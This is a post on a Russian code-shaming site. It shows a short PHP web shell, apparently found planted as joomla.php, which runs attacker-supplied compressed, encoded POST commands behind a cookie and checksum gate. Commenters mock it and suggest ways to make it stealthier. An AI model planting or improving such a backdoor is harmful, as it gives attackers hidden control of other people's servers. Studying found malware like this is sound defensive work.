1. PHP / Говнокод #11438

    +63

    1. 01
    2. 02
    3. 03
    4. 04
    5. 05
    6. 06
    7. 07
    8. 08
    9. 09
    10. 10
    <?php
    if (isset($_COOKIE['adm'])) {
    	if (isset($_POST['crc'], $_POST['cmd'])) {
    		if (sprintf('%u', crc32($_POST['cmd'])) == $_POST['crc']) {
    			eval(gzuncompress(base64_decode($_POST['cmd'])));
    		} else 
    			echo 'repeat_cmd';
    	}
    }
    ?>

    Файл joomla.php в самопальной CMS

    Запостил: kindofbear, 18 Июля 2012

    Комментарии (10) RSS

    • shell?
      Ответить
      • Ну да. Только без фантазии какой-то
        Ответить
        • Ну почему. Тут даже контрольку посчитали, да куку adm проверили... А фантазия у автора есть хотя бы потому, что шелл назван joompla.php.
          Ответить
          • Защита на уровне секретности алгоритма - не ахти. Eval - говно. Crc - говно. Итог прискорбен.
            Ответить
            • Ну и вывод repeat_cmd тут явно лишний. Лучше бы вываливался хидер с ошибкой 404. Так скрытней.
              Ответить
              • Тогда нужно делать вывод ошибки в самом конце, чтобы если какое-то из условий не выполнилось - ошибка. Тут и до repeat_cmd не так просто добраться.
                Ответить
    • Часто встречал эту хрень. Её раскладывают по файлам в автоматическом режиме. Обычное дело заражение вордпрессовских шаблонов и рандомных PHP-скриптов по FTP.
      Ответить

    Добавить комментарий